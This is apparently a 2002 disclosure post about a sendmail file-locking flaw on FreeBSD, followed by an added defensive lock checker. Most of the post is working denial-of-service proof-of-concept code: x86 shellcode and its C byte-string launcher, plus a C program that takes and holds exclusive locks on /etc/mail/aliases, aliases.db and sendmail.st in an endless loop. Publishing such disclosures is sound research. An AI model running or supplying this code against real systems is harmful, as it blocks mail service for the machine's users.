A problem has been identified in sendmail that can result in a denial of service attack. Attached is proof of concept code for this issue.

http://www.sendmail.org/LockingAdvisory.txt

Have a safe Memorial Day, folks.
-KF

;
; Safemode.org, written by zillion 2002/05/24
; http://www.snosoft.com : zillion@snosoft.com
; http://www.sendmail.org/LockingAdvisory.txt
;
BITS 32

jmp short callit
doit:
pop esi
xor eax,eax
mov [esi + 20],al       ; NUL-terminate the path string
push eax
push esi
mov al,5                ; FreeBSD syscall 5: open(path, 0)
push eax
int 0x80
push byte 0x2
push eax
mov al,131              ; FreeBSD syscall 131: flock(fd, 2)
push eax
int 0x80

; We're going to stay forever ;-)

sub cl,0x3
l00p:
js l00p

callit:
call doit
db '/etc/mail/aliases.db'


/*

 FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
 Written by zillion (at http://www.safemode.org && http://www.snosoft.com)

 More info: http://www.sendmail.org/LockingAdvisory.txt

*/

char shellcode[] =
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
        "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
        "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
        "\x69\x61\x73\x65\x73\x2e\x64\x62";

int main()
{
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}


#include <fcntl.h>
#include <unistd.h>

/*

Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info: http://www.sendmail.org/LockingAdvisory.txt

zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com

*/

int main() {

  if(fork() == 0) {

    char *lock1 = "/etc/mail/aliases";
    char *lock2 = "/etc/mail/aliases.db";
    char *lock3 = "/var/log/sendmail.st";

    int fd;

    /* 0x02 is LOCK_EX: an exclusive lock on each file */
    fd = open(lock1,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock2,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock3,O_RDONLY);
    flock(fd,0x02);

    /* We are here to stay! */
    for(;;) {}

  }

}
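
The test program above gets its locks through plain read-only open() calls followed by flock(). As an added example (not part of the original post, and not code from sendmail or the authors), the check below reports for each of the same three paths whether an exclusive lock is currently held and whether the file mode lets anyone but the owner open it; the function names are hypothetical.

```c
/* Added example: defensive check, not part of the original post. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 = another open file description holds an exclusive flock(),
   0 = no conflicting lock, -1 = could not open or probe the file. */
int lock_is_held(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    int result = 0;
    if (flock(fd, LOCK_SH | LOCK_NB) < 0)      /* LOCK_NB: never blocks */
        result = (errno == EWOULDBLOCK) ? 1 : -1;
    else
        flock(fd, LOCK_UN);                    /* release our probe lock */
    close(fd);
    return result;
}

/* 1 = group or other may open the file for reading (the precondition
   for taking a lock the way the test program does), 0 = owner only,
   -1 = stat() failed. */
int readable_by_others(const char *path)
{
    struct stat st;
    if (stat(path, &st) < 0)
        return -1;
    return (st.st_mode & (S_IRGRP | S_IROTH)) ? 1 : 0;
}

int main(void)
{
    /* Paths taken from the test program in the post. */
    const char *paths[] = { "/etc/mail/aliases", "/etc/mail/aliases.db",
                            "/var/log/sendmail.st" };
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++)
        printf("%-24s locked=%d readable_by_others=%d\n", paths[i],
               lock_is_held(paths[i]), readable_by_others(paths[i]));
    return 0;
}
```

A legitimate writer can hold an exclusive lock for a short time, so a single locked=1 reading means little; the signal is a lock that stays held across repeated runs.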